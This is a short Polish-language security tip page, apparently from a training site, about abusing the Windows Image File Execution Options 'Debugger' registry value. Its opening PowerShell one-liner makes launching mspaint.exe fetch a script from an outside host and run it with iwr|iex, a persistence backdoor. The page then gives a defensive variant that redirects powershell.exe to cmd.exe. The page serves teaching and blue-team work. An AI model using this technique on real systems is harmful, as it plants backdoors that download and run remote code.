alphasec academy

ni -f "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mspaint.exe" | sp -name Debugger -Value "powershell -c iwr aptmc.pl/calc|iex #" - dodaj backdoor uruchamiany zamiast startu MS Painta

Dodatkowe informacje

Nasz dzisiejszy oneliner wykorzystuje alias
ni
oraz
sp
, które za pomocą
Get-Alias
możemy łatwo rozwinąć:
PS C:\Users\drg> Get-Alias ni,sp

CommandType   Name                        Version  Source
-----------   ----                        -------  ------
Alias      ni -> New-Item
Alias      sp -> Set-ItemProperty
by stworzyć klucz HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mspaint.exe jeśli nie istnieje (
New-Item -Force
), by następnie dodać wartość o nazwie Debugger (za pomocą
Set-ItemProperty
) definiującą nasz backdoor, który zostanie uruchomiony w momencie, kiedy ktoś uruchomi aplikację
mspaint.exe
. Nasz backdoor to nic innego jak uruchomienie skryptu znajdującego się pod adresem
aptmc.pl/calc
, który nie robi nic wielkiego poza uruchomieniem kalkulatora.
Więcej informacji o tym mechaniźmie było poruszane w protipie aptm.in/protip/0008, który był onelinerem pokazującym czy tego typu wpisy mamy zdefiniowane.

A coś dla niebieskich?

A czy dla Blue Teamów to też może być przydatne? No pewnie, oneliner poniżej spowoduje, że kiedy ktoś będzie chciał uruchomić
powershell.exe
, uruchomi mu się zamiast tego
cmd.exe
, a więc standardowo uruchamiany malware napisany w Powershellu się nie uruchomi:
New-Item -Force "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe" | Set-ItemProperty -Name Debugger -Value "cmd.exe"
Oczywiście nie jest to zupełnie mądry pomysł, natomiast jest to jeden z ciekawych sposobów, jak możemy zablokowoać uruchamianie programów o danej nazwie (np. setup.exe). A zamiast wskazywanie na
cmd..exe
możemy wskazać na własny program raportujący to wydarzenie, lub chociażby prosty skrypt Powershella, który tego dokona.

Przydatne linki


Subskrybuj

Jeśli chcesz otrzymywać nowe, mięsiste protipy na maila, a także zostać czasem powiadomiony o wartościowych wydarzeniach - dołącz do subskrybentów.